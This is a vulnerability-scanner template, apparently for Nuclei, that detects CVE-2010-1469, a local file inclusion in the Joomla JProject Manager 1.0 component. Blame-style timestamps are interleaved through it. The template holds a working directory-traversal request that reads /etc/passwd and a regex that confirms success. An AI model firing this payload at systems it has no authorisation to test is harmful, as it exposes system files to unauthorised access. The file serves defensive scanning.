2021-09-27 11:02:48 +00:00
id : CVE-2010-1469
info :
name : Joomla! Component JProject Manager 1.0 - Local File Inclusion
author : daffainfo
2023-07-11 19:49:27 +00:00
severity : medium
2022-02-15 06:09:56 +00:00
description : A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to the latest version to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/12146
2023-03-02 22:00:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2010-1469
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
2022-05-17 20:46:49 +00:00
- http://www.exploit-db.com/exploits/12146
2022-02-15 06:09:56 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
2023-07-11 19:49:27 +00:00
cvss-score : 6.8
2022-02-15 06:09:56 +00:00
cve-id : CVE-2010-1469
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.00813
2023-08-31 11:46:18 +00:00
epss-percentile : 0.79614
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : ternaria
product : com_jprojectmanager
tags : lfi,edb,packetstorm,cve,cve2010,joomla
2021-09-27 11:02:48 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-27 11:02:48 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
- type : status
status :
2022-02-15 06:09:56 +00:00
- 200